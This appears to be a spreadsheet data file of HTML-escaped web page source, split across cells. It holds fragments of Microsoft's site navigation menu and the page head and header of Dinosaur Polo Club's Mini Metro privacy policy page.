data-m="{&amp;quot;cN&amp;quot;:&amp;quot;More_Software_Skype_cont&amp;quot;,&amp;quot;cT&amp;quot;:&amp;quot;Container&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;c10c9c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:10,&amp;quot;aN&amp;quot;:&amp;quot;c9c2c1c8c2m1r1a1&amp;quot;}"&gt;&lt;a id="shellmenu_21" class="js-subm-uhf-nav-link" href="https://www.skype.com/en/" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;GlobalNav_More_Software_Skype_nav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;n1c10c9c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;c10c9c2c1c8c2m1r1a1&amp;quot;}"&gt;Skype&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;li class="f-sub-menu js-nav-menu nested-menu" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;PCsAndDevices_cont&amp;quot;,&amp;quot;cT&amp;quot;:&amp;quot;Container&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;c10c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:10,&amp;quot;aN&amp;quot;:&amp;quot;c2c1c8c2m1r1a1&amp;quot;}"&gt;&lt;span id="uhf-navspn-shellmenu_22-span" style="display:none" f-multi-parent="true" aria-expanded="false" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;GlobalNav_PCsAndDevices_nonnav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;nn1c10c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;c10c2c1c8c2m1r1a1&amp;quot;}"&gt;PCs &amp;amp; Devices  &lt;/span&gt;&lt;button id="uhf-navbtn-shellmenu_22-button" type="button" f-multi-parent="true" aria-expanded="false" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;GlobalNav_PCsAndDevices_nonnav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;nn2c10c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:2,&amp;quot;aN&amp;quot;:&amp;quot;c10c2c1c8c2m1r1a1&amp;quot;}"&gt;PCs &amp;amp; Devices  &lt;/button&gt;&lt;ul aria-hidden="true" aria-labelledby="uhf-navspn-shellmenu_22-span"&gt;&lt;li class="js-nav-menu single-link" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;More_PCsAndDevices_PCsAndTablets_cont&amp;quot;,&amp;quot;cT&amp;quot;:&amp;quot;Container&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;c3c10c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:3,&amp;quot;aN&amp;quot;:&amp;quot;c10c2c1c8c2m1r1a1&amp;quot;}"&gt;&lt;a id="shellmenu_23" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/en-us/store/b/pc?icid=CNavDevicesPC" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;GlobalNav_More_PCsAndDevices_PCsAndTablets_nav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;n1c3c10c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;c3c10c2c1c8c2m1r1a1&amp;quot;}"&gt;Computers&lt;/a&gt;&lt;/li&gt;&lt;li class="js-nav-menu single-link" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;More_PCsAndDevices_ShopXbox_cont&amp;quot;,&amp;quot;cT&amp;quot;:&amp;quot;Container&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;c4c10c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:4,&amp;quot;aN&amp;quot;:&amp;quot;c10c2c1c8c2m1r1a1&amp;quot;}"&gt;&lt;a id="shellmenu_24" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/en-us/store/b/xbox?icid=CNavDevicesXbox" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;GlobalNav_More_PCsAndDevices_ShopXbox_nav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;n1c4c10c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;c4c10c2c1c8c2m1r1a1&amp;quot;}"&gt;Shop Xbox&lt;/a&gt;&lt;/li&gt;&lt;li class="js-nav-menu single-link" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;More_PCsAndDevices_Accessories_cont&amp;quot;,&amp;quot;cT&amp;quot;:&amp;quot;Container&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;c5c10c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:5,&amp;quot;aN&amp;quot;:&amp;quot;c10c2c1c8c2m1r1a1&amp;quot;}"&gt;&lt;a id="shellmenu_25" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/en-us/store/b/accessories?icid=CNavDevicesAccessories" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;GlobalNav_More_PCsAndDevices_Accessories_nav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;n1c5c10c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;c5c10c2c1c8c2m1r1a1&amp;quot;}"&gt;Accessories&lt;/a&gt;&lt;/li&gt;&lt;li class="js-nav-menu single-link" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;More_PCsAndDevices_VMAndMixedReality_cont&amp;quot;,&amp;quot;cT&amp;quot;:&amp;quot;Container&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;c6c10c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:6,&amp;quot;aN&amp;quot;:&amp;quot;c10c2c1c8c2m1r1a1&amp;quot;}"&gt;&lt;a id="shellmenu_26" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/en-us/store/b/virtualreality?icid=CNavVirtualReality" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;GlobalNav_More_PCsAndDevices_VMAndMixedReality_nav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;n1c6c10c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;c6c10c2c1c8c2m1r1a1&amp;quot;}"&gt;VR &amp;amp; mixed reality&lt;/a&gt;&lt;/li&gt;&lt;li class="js-nav-menu single-link" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;More_PCsAndDevices_Phones_cont&amp;quot;,&amp;quot;cT&amp;quot;:&amp;quot;Container&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;c7c10c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:7,&amp;quot;aN&amp;quot;:&amp;quot;c10c2c1c8c2m1r1a1&amp;quot;}"&gt;&lt;a id="shellmenu_27" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/en-us/store/b/mobile?icid=CNavDevicesMobile" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;GlobalNav_More_PCsAndDevices_Phones_nav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;n1c7c10c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;c7c10c2c1c8c2m1r1a1&amp;quot;}"&gt;Phones&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;li class="f-sub-menu js-nav-menu nested-menu" data-m="{&amp;quot;cT&amp;quot;:&amp;quot;Container&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;c11c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:11,&amp;quot;aN&amp;quot;:&amp;quot;c2c1c8c2m1r1a1&amp;quot;}"&gt;&lt;span id="uhf-navspn-shellmenu_28-span" style="display:none" f-multi-parent="true" aria-expanded="false" data-m="{&amp;quot;id&amp;quot;:&amp;quot;nn1c11c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;c11c2c1c8c2m1r1a1&amp;quot;}"&gt;Entertainment&lt;/span&gt;&lt;button id="uhf-navbtn-shellmenu_28-button" type="button" f-multi-parent="true" aria-expanded="false" data-m="{&amp;quot;id&amp;quot;:&amp;quot;nn2c11c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:2,&amp;quot;aN&amp;quot;:&amp;quot;c11c2c1c8c2m1r1a1&amp;quot;}"&gt;Entertainment&lt;/button&gt;&lt;ul aria-hidden="true" aria-labelledby="uhf-navspn-shellmenu_28-span"&gt;&lt;li class="js-nav-menu single-link" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;More_Entertainment_XboxGamePassUltimate_cont&amp;quot;,&amp;quot;cT&amp;quot;:&amp;quot;Container&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;c3c11c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:3,&amp;quot;aN&amp;quot;:&amp;quot;c11c2c1c8c2m1r1a1&amp;quot;}"&gt;&lt;a id="shellmenu_29" class="js-subm-uhf-nav-link" href="https://www.xbox.com/en-us/games/store/xbox-game-pass-ultimate/cfq7ttc0khs0?icid=CNavAllXboxGamePassUltimate" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;GlobalNav_More_Entertainment_XboxGamePassUltimate_nav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;n1c3c11c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;c3c11c2c1c8c2m1r1a1&amp;quot;}"&gt;Xbox Game Pass Ultimate&lt;/a&gt;&lt;/li&gt;&lt;li class="js-nav-menu single-link" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;More_Entertainment_PC_Game_Pass_cont&amp;quot;,&amp;quot;cT&amp;quot;:&amp;quot;Container&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;c4c11c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:4,&amp;quot;aN&amp;quot;:&amp;quot;c11c2c1c8c2m1r1a1&amp;quot;}"&gt;&lt;a id="shellmenu_30" class="js-subm-uhf-nav-link" href="https://www.xbox.com/en-us/games/store/pc-game-pass/cfq7ttc0kgq8?icid=CNavAllPCGamePass" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;GlobalNav_More_Entertainment_PC_Game_Pass_nav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;n1c4c11c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;c4c11c2c1c8c2m1r1a1&amp;quot;}"&gt;PC Game Pass&lt;/a&gt;&lt;/li&gt;&lt;li class="js-nav-menu single-link" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;More_Entertainment_XboxGames_cont&amp;quot;,&amp;quot;cT&amp;quot;:&amp;quot;Container&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;c5c11c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:5,&amp;quot;aN&amp;quot;:&amp;quot;c11c2c1c8c2m1r1a1&amp;quot;}"&gt;&lt;a id="shellmenu_31" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/en-us/store/b/xboxgames?icid=CNavGamesXboxGames" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;GlobalNav_More_Entertainment_XboxGames_nav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;n1c5c11c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;c5c11c2c1c8c2m1r1a1&amp;quot;}"&gt;Xbox games&lt;/a&gt;&lt;/li&gt;&lt;li class="js-nav-menu single-link" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;More_Entertainment_PCGames_cont&amp;quot;,&amp;quot;cT&amp;quot;:&amp;quot;Container&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;c6c11c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:6,&amp;quot;aN&amp;quot;:&amp;quot;c11c2c1c8c2m1r1a1&amp;quot;}"&gt;&lt;a id="shellmenu_32" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/en-us/store/games/windows?icid=CNavGamesWindowsGames" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;GlobalNav_More_Entertainment_PCGames_nav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;n1c6c11c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;c6c11c2c1c8c2m1r1a1&amp;quot;}"&gt;PC games&lt;/a&gt;&lt;/li&gt;&lt;li class="js-nav-menu single-link" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;More_Entertainment_WindowsDigitalGames_cont&amp;quot;,&amp;quot;cT&amp;quot;:&amp;quot;Container&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;c7c11c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:7,&amp;quot;aN&amp;quot;:&amp;quot;c11c2c1c8c2m1r1a1&amp;quot;}"&gt;&lt;a id="shellmenu_33" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/en-us/store/games/windows?icid=TopNavWindowsGames" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;GlobalNav_More_Entertainment_WindowsDigitalGames_nav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;n1c7c11c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;c7c11c2c1c8c2m1r1a1&amp;quot;}"&gt;Windows digital games&lt;/a&gt;&lt;/li&gt;&lt;li class="js-nav-menu single-link" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;More_Entertainment_MoviesAndTV_cont&amp;quot;,&amp;quot;cT&amp;quot;:&amp;quot;Container&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;c8c11c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:8,&amp;quot;aN&amp;quot;:&amp;quot;c11c2c1c8c2m1r1a1&amp;quot;}"&gt;&lt;a id="shellmenu_34" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/en-us/store/movies-and-tv?icid=TopNavMoviesTv" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;GlobalNav_More_Entertainment_MoviesAndTV_nav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;n1c8c11c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;c8c11c2c1c8c2m1r1a1&amp;quot;}"&gt;Movies &amp;amp;</t>
  </si>
  <si>
    <t>TV&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;li class="f-sub-menu js-nav-menu nested-menu" data-m="{&amp;quot;cT&amp;quot;:&amp;quot;Container&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;c12c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:12,&amp;quot;aN&amp;quot;:&amp;quot;c2c1c8c2m1r1a1&amp;quot;}"&gt;&lt;span id="uhf-navspn-shellmenu_35-span" style="display:none" f-multi-parent="true" aria-expanded="false" data-m="{&amp;quot;id&amp;quot;:&amp;quot;nn1c12c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;c12c2c1c8c2m1r1a1&amp;quot;}"&gt;Business&lt;/span&gt;&lt;button id="uhf-navbtn-shellmenu_35-button" type="button" f-multi-parent="true" aria-expanded="false" data-m="{&amp;quot;id&amp;quot;:&amp;quot;nn2c12c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:2,&amp;quot;aN&amp;quot;:&amp;quot;c12c2c1c8c2m1r1a1&amp;quot;}"&gt;Business&lt;/button&gt;&lt;ul aria-hidden="true" aria-labelledby="uhf-navspn-shellmenu_35-span"&gt;&lt;li class="js-nav-menu single-link" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;More_Business_Microsoft_Cloud_cont&amp;quot;,&amp;quot;cT&amp;quot;:&amp;quot;Container&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;c3c12c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:3,&amp;quot;aN&amp;quot;:&amp;quot;c12c2c1c8c2m1r1a1&amp;quot;}"&gt;&lt;a id="shellmenu_36" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/en-us/microsoft-cloud" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;GlobalNav_More_Business_Microsoft_Cloud_nav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;n1c3c12c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;c3c12c2c1c8c2m1r1a1&amp;quot;}"&gt;Microsoft Cloud&lt;/a&gt;&lt;/li&gt;&lt;li class="js-nav-menu single-link" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;More_Business_Microsoft Security_cont&amp;quot;,&amp;quot;cT&amp;quot;:&amp;quot;Container&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;c4c12c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:4,&amp;quot;aN&amp;quot;:&amp;quot;c12c2c1c8c2m1r1a1&amp;quot;}"&gt;&lt;a id="shellmenu_37" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/en-us/security" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;GlobalNav_More_Business_Microsoft Security_nav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;n1c4c12c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;c4c12c2c1c8c2m1r1a1&amp;quot;}"&gt;Microsoft Security&lt;/a&gt;&lt;/li&gt;&lt;li class="js-nav-menu single-link" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;More_Business_MicrosoftDynamics365_cont&amp;quot;,&amp;quot;cT&amp;quot;:&amp;quot;Container&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;c5c12c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:5,&amp;quot;aN&amp;quot;:&amp;quot;c12c2c1c8c2m1r1a1&amp;quot;}"&gt;&lt;a id="shellmenu_38" class="js-subm-uhf-nav-link" href="https://dynamics.microsoft.com/en-us/" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;GlobalNav_More_Business_MicrosoftDynamics365_nav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;n1c5c12c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;c5c12c2c1c8c2m1r1a1&amp;quot;}"&gt;Dynamics 365&lt;/a&gt;&lt;/li&gt;&lt;li class="js-nav-menu single-link" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;More_Business_Microsoft365forbusiness_cont&amp;quot;,&amp;quot;cT&amp;quot;:&amp;quot;Container&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;c6c12c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:6,&amp;quot;aN&amp;quot;:&amp;quot;c12c2c1c8c2m1r1a1&amp;quot;}"&gt;&lt;a id="shellmenu_39" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/en-us/microsoft-365/business" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;GlobalNav_More_Business_Microsoft365forbusiness_nav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;n1c6c12c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;c6c12c2c1c8c2m1r1a1&amp;quot;}"&gt;Microsoft 365 for business&lt;/a&gt;&lt;/li&gt;&lt;li class="js-nav-menu single-link" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;More_Business_MicrosoftPowerPlatform_cont&amp;quot;,&amp;quot;cT&amp;quot;:&amp;quot;Container&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;c7c12c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:7,&amp;quot;aN&amp;quot;:&amp;quot;c12c2c1c8c2m1r1a1&amp;quot;}"&gt;&lt;a id="shellmenu_40" class="js-subm-uhf-nav-link" href="https://powerplatform.microsoft.com/en-us/" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;GlobalNav_More_Business_MicrosoftPowerPlatform_nav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;n1c7c12c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;c7c12c2c1c8c2m1r1a1&amp;quot;}"&gt;Microsoft Power Platform&lt;/a&gt;&lt;/li&gt;&lt;li class="js-nav-menu single-link" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;More_Business_Windows365_cont&amp;quot;,&amp;quot;cT&amp;quot;:&amp;quot;Container&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;c8c12c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:8,&amp;quot;aN&amp;quot;:&amp;quot;c12c2c1c8c2m1r1a1&amp;quot;}"&gt;&lt;a id="shellmenu_41" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/en-us/windows-365</t>
  </si>
  <si>
    <t>&lt;!doctype html&gt;&lt;html lang="en-US"&gt;&lt;head&gt;&lt;meta charset="UTF-8"&gt;&lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;&lt;link rel="profile" href="https://gmpg.org/xfn/11"&gt; &lt;script async src="https://www.googletagmanager.com/gtag/js?UA-48768134-1"&gt;&lt;/script&gt; &lt;script&gt;window.dataLayer = window.dataLayer || [];
	function gtag(){dataLayer.push(arguments);}
	gtag('js', new Date());
	gtag('config', 'UA-48768134-1');&lt;/script&gt; &lt;meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' /&gt;&lt;link media="all" href="https://dinopoloclub.com/wp-content/cache/autoptimize/css/autoptimize_66e863d0bde718fe605305487a4e54b7.css" rel="stylesheet" /&gt;&lt;title&gt;Privacy Policy: Mini Metro - Dinosaur Polo Club&lt;/title&gt;&lt;link rel="canonical" href="https://dinopoloclub.com/games/mini-metro/privacy-policy/" /&gt;&lt;meta</t>
  </si>
  <si>
    <t>property="og:locale" content="en_US" /&gt;&lt;meta property="og:type" content="article" /&gt;&lt;meta property="og:title" content="Privacy Policy: Mini Metro - Dinosaur Polo Club" /&gt;&lt;meta</t>
  </si>
  <si>
    <t>property="og:description" content="Leaderboards If you run the game through Steam or GOG Galaxy, we use their leaderboard systems. If you got the [&amp;hellip;]" /&gt;&lt;meta</t>
  </si>
  <si>
    <t>property="og:url" content="https://dinopoloclub.com/games/mini-metro/privacy-policy/" /&gt;&lt;meta property="og:site_name" content="Dinosaur Polo Club" /&gt;&lt;meta property="article:modified_time" content="2021-03-18T03:26:06+00:00" /&gt;&lt;meta name="twitter:card" content="summary_large_image" /&gt;&lt;meta name="twitter:label1" content="Est.</t>
  </si>
  <si>
    <t>reading time" /&gt;&lt;meta name="twitter:data1" content="2 minutes" /&gt; &lt;script type="application/ld+json" class="yoast-schema-graph"&gt;{"@context":"https://schema.org","@graph":[{"@type":"WebPage","@id":"https://dinopoloclub.com/games/mini-metro/privacy-policy/","url":"https://dinopoloclub.com/games/mini-metro/privacy-policy/","name":"Privacy Policy: Mini Metro - Dinosaur Polo Club","isPartOf":{"@id":"https://dinopoloclub.com/#website"},"datePublished":"2019-09-04T20:19:44+00:00","dateModified":"2021-03-18T03:26:06+00:00","breadcrumb":{"@id":"https://dinopoloclub.com/games/mini-metro/privacy-policy/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https://dinopoloclub.com/games/mini-metro/privacy-policy/"]}]},{"@type":"BreadcrumbList","@id":"https://dinopoloclub.com/games/mini-metro/privacy-policy/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://dinopoloclub.com/"},{"@type":"ListItem","position":2,"name":"Games","item":"https://dinopoloclub.com/games/"},{"@type":"ListItem","position":3,"name":"Mini Metro","item":"https://dinopoloclub.com/games/mini-metro/"},{"@type":"ListItem","position":4,"name":"Privacy Policy: Mini Metro"}]},{"@type":"WebSite","@id":"https://dinopoloclub.com/#website","url":"https://dinopoloclub.com/","name":"Dinosaur Polo Club","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://dinopoloclub.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"}]}&lt;/script&gt; &lt;link rel='dns-prefetch' href='//ajax.googleapis.com' /&gt;&lt;link rel='dns-prefetch' href='//cdnjs.cloudflare.com' /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel='dns-prefetch' href='//fonts.googleapis.com' /&gt;&lt;link rel="alternate" type="application/rss+xml" title="Dinosaur Polo Club &amp;raquo; Feed" href="https://dinopoloclub.com/feed/" /&gt; &lt;script type="text/javascript"&gt;window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/dinopoloclub.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=b86d8f380661c6a51352668afa64007d"}};
/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t>
  </si>
  <si>
    <t>o.length;r++)t.supports[o[r]]=function(e){if(p&amp;&amp;p.fillText)switch(p.textBaseline="top",p.font="600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[129777,127995,8205,129778,127999],[129777,127995,8203,129778,127999])}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lt;/script&gt; &lt;link rel='stylesheet' id='slick-style-css' href='//cdnjs.cloudflare.com/ajax/libs/slick-carousel/1.9.0/slick.min.css?ver=b86d8f380661c6a51352668afa64007d' type='text/css' media='all' /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel='stylesheet' id='google_fonts-css' href='//fonts.googleapis.com/css?family=Montserrat:400,600,700,800&amp;#038;display=swap&amp;#038;subset=latin' type='text/css' media='all' /&gt;&lt;link rel="https://api.w.org/" href="https://dinopoloclub.com/wp-json/" /&gt;&lt;link rel="alternate" type="application/json" href="https://dinopoloclub.com/wp-json/wp/v2/pages/744" /&gt;&lt;link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://dinopoloclub.com/xmlrpc.php?rsd" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://dinopoloclub.com/wp-includes/wlwmanifest.xml" /&gt;&lt;link rel='shortlink' href='https://dinopoloclub.com/?p=744' /&gt;&lt;link rel="alternate" type="application/json+oembed" href="https://dinopoloclub.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fdinopoloclub.com%2Fgames%2Fmini-metro%2Fprivacy-policy%2F" /&gt;&lt;link rel="alternate" type="text/xml+oembed" href="https://dinopoloclub.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fdinopoloclub.com%2Fgames%2Fmini-metro%2Fprivacy-policy%2F&amp;#038;format=xml" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="icon" href="https://dinopoloclub.com/wp-content/uploads/2019/09/cropped-Red-dino-on-transparent-field-square-32x32.png" sizes="32x32" /&gt;&lt;link rel="icon" href="https://dinopoloclub.com/wp-content/uploads/2019/09/cropped-Red-dino-on-transparent-field-square-192x192.png" sizes="192x192" /&gt;&lt;link rel="apple-touch-icon" href="https://dinopoloclub.com/wp-content/uploads/2019/09/cropped-Red-dino-on-transparent-field-square-180x180.png" /&gt;&lt;meta name="msapplication-TileImage" content="https://dinopoloclub.com/wp-content/uploads/2019/09/cropped-Red-dino-on-transparent-field-square-270x270.png" /&gt;&lt;/head&gt;&lt;body class="page-template-default page page-id-744 page-child parent-pageid-19 no-sidebar"&gt;&lt;div id="page" class="site"&gt;&lt;header id="masthead" class="site-header"&gt;&lt;div class="header-content"&gt;&lt;div class="site-branding"&gt;&lt;p class="site-title"&gt;&lt;a href="https://dinopoloclub.com/" rel="home"&gt;Dinosaur Polo Club&lt;/a&gt;&lt;/p&gt;&lt;/div&gt;&lt;nav id="site-navigation" class="main-navigation"&gt; &lt;button name="menu" class="hamburger menu-toggle hamburger--squeeze" type="button" aria-controls="primary-menu" aria-expanded="false" title="Menu"&gt; &lt;span class="hamburger-box"&gt; &lt;span class="hamburger-inner"&gt;&lt;div&gt;Menu&lt;/div&gt;&lt;/span&gt; &lt;/span&gt; &lt;/button&gt;&lt;div class="menu-menu-container"&gt;&lt;ul id="primary-menu" class="menu"&gt;&lt;li id="menu-item-154" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-154"&gt;&lt;a href="https://dinopoloclub.com/"&gt;Homepage&lt;/a&gt;&lt;/li&gt;&lt;li id="menu-item-87" class="menu-item menu-item-type-post_type menu-item-object-page current-page-ancestor menu-item-87"&gt;&lt;a href="https://dinopoloclub.com/games/"&gt;Games&lt;/a&gt;&lt;/li&gt;&lt;li id="menu-item-83" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-83"&gt;&lt;a href="https://dinopoloclub.com/about/"&gt;About&lt;/a&gt;&lt;/li&gt;&lt;li 